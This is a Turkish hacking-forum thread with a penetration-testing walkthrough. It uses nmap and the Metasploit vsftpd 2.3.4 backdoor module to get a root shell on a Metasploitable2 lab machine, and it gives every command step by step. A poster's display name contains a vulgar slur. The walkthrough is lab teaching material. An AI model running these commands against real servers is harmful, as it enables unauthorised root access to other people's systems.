FTP Sunucu Hackleme (NMAP) (2 Viewers)

Joined
Oct 23, 2017
Credits
0
Rating - 0%
İyi diyonda bu sadece labda çalışıyor . Kim ftp protokollerinde vsfptd kullanıyor . Mağara
 

Adamındibi

OROSPU EVLADIYIM
Joined
Aug 29, 2019
Credits
0
Rating - 0%
View hidden content is available for registered users!

Bu konuda, FTP protokolü üzerinde ki "vsftpd 2.3.4" uygulamasını exploit ederek hedef sistemde root yetkisine çıkmayı göstereceğim.

Sızma Testi senaryosunu gerçekleştirirken, laborotatuvar ortamı olarak, "métasploitable2-Linux" sistemini kullandım.

Artık anlatıma geçelim.

Öncelikle hedef sunucumuzda bir nmap ile port taraması yaparak keşif çalışmamızı yapalım.

"nmap -sV 192.168.127.130" hedef sunucumuzun İP adresidir.


Tarama sonucunda gördüğünüz gibi, FTP protokolü üzerinde, "vsftpd 2.3.4" uygulaması çalışmakta.

Biz de bunu kullanarak hedef sunucuya sızabiliriz.

Açalım bakalım, métasploit framework’ ümüzü

"msfconsole" diyerek açıyoruz.


search vsftpd" komutunu girerek explotimizi aradık.

"use exploit/unix/ftp/vsftpd_234_backdoor" exploitimize giriyoruz.

"show payloads" komutu ile exploite uygun payloadları arıyoruz ve "cmd/unix/interact" payloadını seçiyoruz.


ardından, "show options" komutunu girerek, genel ayarları yapıyoruz.

"set RHOST 192.168.127.130" ve "set RPORT 21" bilgilerini girerek exploiti çalıştırıyoruz.


exploit sonucunda, hedef sistemde root yetkisi kazanmış olduk.

UID: uid=0(root) gid=0(root)

görüldüğü üzere, "command shell session 1 opened" 1 shell oturumu açıldı. Artık linux komutlarıı çalıştırabiliriz. Gerisi
size kalmış.

"whoami" komutunu girdim, "root" çıktısını aldım. Bu demek oluyorki sen root kullanıcısısın artık.

"uname -a" komutu ile hedef sistemin kernel sürümünü öğrendim.

"ls" komutu ile bulunduğum dizinin dosyalarını listeledim. Ve çok şey yapabiliriz.
SON ;)


nmap-wordpress-script-scanning.png
güzel içerik !
 

Users who are viewing this thread

Top